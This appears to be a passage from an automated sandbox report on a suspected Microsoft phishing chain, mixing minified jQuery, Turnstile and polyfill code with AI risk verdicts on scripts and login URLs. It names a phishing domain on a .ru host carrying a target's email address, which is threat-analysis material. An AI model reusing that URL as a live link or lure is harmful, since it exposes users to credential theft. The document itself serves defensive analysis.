null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s |
| URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI | ```json
{
"risk_score": 3,
"reasoning": "The script contains obfuscated code, which is a high-risk indicator. However, there are no clear signs of malicious behavior such as data exfiltration or dynamic code execution. The obfuscation could be for legitimate purposes, such as protecting intellectual property."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://amer.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://amer.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://aadcdn.msauth.net/shared/1.0/content/js/Bs... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or obfuscation. The script is well-documented and licensed under the public domain, indicating it is likely a trusted and widely-used utility. While it uses some moderate-risk practices like external data transmission and fallback domains, these are common in modern web development and do not appear to be used for malicious purposes. Overall, this script poses a low risk and is likely a benign utility."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.com/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t,n){var |
| URL: https://aadcdn.msauth.net/shared/1.0/content/js/Co... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code. The script is well-documented and licensed under the public domain, indicating it is likely a trusted and widely-used utility. While it uses some moderate-risk practices like legacy APIs and external data transmission, these are common in polyfills and do not suggest malicious intent. Overall, this script is considered low-risk and likely serves a legitimate purpose."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.com/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)i=o[s],Object.prototype.hasOwnProperty.call(a,i)&&a[i]&&c.push(a[i][0]),a[i]=0;for(t in r)Object.prototype.hasOwnProperty.call(r,t)&&(e[t]=r[t]);for(d&&d(n);c.length;)c.shift()()}var t,i={},a={24:0};function o(n){if(i[n])return i[n].exports;var t=i[n]={i:n,l:!1,exports:{}};return e[n].call(t.exports,t,t.exports,o),t.l=!0,t.exports}Function.prototype.bind||(t=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var n=t.call(arguments,1),i=n.length,a=this,o=function(){},r=function(){return n.length=i,n.push.apply(n,arguments),a.apply(o.prototype.isPrototypeOf(this)?this:e,n)};return this.prototype&&(o.prototype=this.prototype),r.prototype=new o,r}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(n){var t=this,i=0,a=null,o=[];function r(){if(o.length>0){var e=o.slice();o=[],setTimeout((function(){for(var n=0,t=e.length;n<t;++n)e[n]()}),0)}}function s(e){0===i&&(a=e,i=1,r())}function c(e){0===i&&(a=e,i=2,r())}t.then=function(n,t){return new e((function(s,c){!function(n,t,s,c){o.push((function(){var o;try{o=1===i?"function"==typeof n?n(a):a:"function"==typeof t?t(a):a}catch(r){return void c(r)}o instanceof e?o.then(s,c):2===i&&"function"!=typeof t?c(o):s(o)})),0!==i&&r()}(n,t,s,c)}))},t["catch"]=function(e){return t.then(null,e)},function(){if("function"!=typeof n)throw new TypeError("Promise: argument is not a Function object");try{n(s,c)}catch(e){c(e)}}()}function n(e,n,t,i,a){return function(o){e[n]=i?o:a?{status:"fulfilled",value:o}:{status:"rejected",reason:o},t()}}function t(t,i){return t&&t.length?new e((function(a,o){for(var r=[],s=0,c=0,d=t.length;c<d;++c){var l=t[c];if(l instanceof e){s++;var u=function(){0==--s&&a(r)};i?l.then(n(r,c,u,i),o):l.then(n(r,c,u,i,!0),n(r,c,u,i,!1))}else r[c]=l}0===s&&setTimeout((function(){a(r)}),0)})):e.resolve([])}function i(e,n){return function(){e(n)}}e.all=function(e){return t(e,!0)},e.allSettled=function(e){return t(e,!1)},e.race=function(n){return new e((function(t,a){if(n&&n.length)for(var o=0,r=n.length;o<r;++o){var s=n[o];s instanceof e?s.then(t,a):setTimeout(i(t,s),0)}}))},e.reject=function(n){return new e((function(e,t){t(n)}))},e.resolve=function(n){return n instanceof e?n:n&&"function"==typeof n.then?new e((function(e,t){n.then(e,t)})):new e((function(e){e(n)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),o.e=function(e){var n=[],t=a[e];if(0!==t)if(t)n.push(t[2]);else{var i=new Promise((function(n,i){t=a[e]=[n,i]}));n.push(t[2]=i);var r=window.ServerData,s=r&&r.loader&&r.loader.cdnRoots||[],c=r&&r.slMaxRetry?r.slMaxRetry:s.length-1,d=new Error;var l=function u(n,t){var |
| URL: https://login.microsoftonline.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "This is a legitimate Microsoft login page using the official microsoftonline.com domain. The domain is owned and operated by Microsoft for their cloud services."
} |
URL: https://login.microsoftonline.com |
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=xZk Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Enter password",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.live.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "This is a legitimate Microsoft login domain. The domain live.com is a well-known Microsoft property, and the login subdomain is their standard authentication endpoint."
} |
URL: https://login.live.com |
| URL: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=xZk Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Enter password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=xZk Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Enter password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=xZk Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=xZk Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=xZk Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=xZk Model: Joe Sandbox AI | ```json{ "legit_domain": "live.com", "classification": "wellknown", "reasons": [ "The URL 'login.live.com' is a subdomain of 'live.com', which is a legitimate domain owned by Microsoft.", "Microsoft is a well-known brand, and 'live.com' is commonly associated with Microsoft services.", "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.", "The presence of a password input field is typical for a login page, especially for a service like Microsoft Live." ], "riskscore": 1} |
URL: login.live.com
Brands: Microsoft
Input Fields: Password |
| URL: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=xZk Model: Joe Sandbox AI | ```json{ "legit_domain": "live.com", "classification": "wellknown", "reasons": [ "The URL 'login.live.com' is a subdomain of 'live.com', which is a legitimate domain owned by Microsoft.", "Microsoft is a well-known brand, and 'live.com' is commonly associated with Microsoft services.", "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.", "The input field 'Enter password' is typical for a login page, which aligns with the URL 'login.live.com'." ], "riskscore": 1} |
URL: login.live.com
Brands: Microsoft
Input Fields: Enter password |
| URL: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=xZk Model: Joe Sandbox AI | ```json{ "legit_domain": "live.com", "classification": "wellknown", "reasons": [ "The URL 'login.live.com' is a subdomain of 'live.com', which is a legitimate domain owned by Microsoft.", "Microsoft is a well-known brand, and 'live.com' is associated with Microsoft's services, such as Outlook and OneDrive.", "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.", "The input field 'Enter password' is consistent with a login page, which is expected for a Microsoft service." ], "riskscore": 1} |
URL: login.live.com
Brands: Microsoft
Input Fields: Enter password |
| URL: https://login.live.com/ppsecure/post.srf?username=bob%40bobco.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=013E93DD8D5A6A3D&opid=1EA2A0A0DFE19CA4&bk=1736951122&uaid=cbba7f3fbc384550a993696f966c75c3&pid=15216 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign-in is blocked",
"prominent_button_name": "Reset your password",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.live.com/ppsecure/post.srf?username=bob%40bobco.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=013E93DD8D5A6A3D&opid=1EA2A0A0DFE19CA4&bk=1736951122&uaid=cbba7f3fbc384550a993696f966c75c3&pid=15216 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Reset your password",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.live.com/ppsecure/post.srf?username=bob%40bobco.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=013E93DD8D5A6A3D&opid=1EA2A0A0DFE19CA4&bk=1736951122&uaid=cbba7f3fbc384550a993696f966c75c3&pid=15216 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.live.com/ppsecure/post.srf?username=bob%40bobco.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=013E93DD8D5A6A3D&opid=1EA2A0A0DFE19CA4&bk=1736951122&uaid=cbba7f3fbc384550a993696f966c75c3&pid=15216 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://account.live.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "This is a legitimate Microsoft Live account domain. The domain live.com is officially owned and operated by Microsoft for their online services."
} |
URL: https://account.live.com |
| URL: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fusername%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d937652 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Recover your account",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype name"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fusername%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d937652 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Recover your account",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype name"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fusername%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d937652 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fusername%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d937652 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fusername%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d937652 Model: Joe Sandbox AI | ```json{ "legit_domain": "live.com", "classification": "wellknown", "reasons": [ "The URL 'account.live.com' is a subdomain of 'live.com', which is a legitimate domain owned by Microsoft.", "Microsoft is a well-known brand, and 'live.com' is commonly associated with Microsoft services.", "The input fields 'Email, phone, or Skype name' are typical for Microsoft account login pages.", "There are no suspicious elements in the URL such as misspellings, extra characters, or unusual domain extensions." ], "riskscore": 1} |
URL: account.live.com
Brands: Microsoft
Input Fields: Email, phone, or Skype name |
| URL: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fusername%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d937652 Model: Joe Sandbox AI | ```json{ "legit_domain": "live.com", "classification": "wellknown", "reasons": [ "The URL 'account.live.com' is a subdomain of 'live.com', which is a legitimate domain owned by Microsoft.", "Microsoft is a well-known brand, and 'live.com' is commonly associated with Microsoft services.", "The input fields 'Email, phone, or Skype name' are typical for Microsoft account login pages.", "There are no suspicious elements in the URL such as misspellings, extra characters, or unusual domain extensions." ], "riskscore": 1} |
URL: account.live.com
Brands: Microsoft
Input Fields: Email, phone, or Skype name |
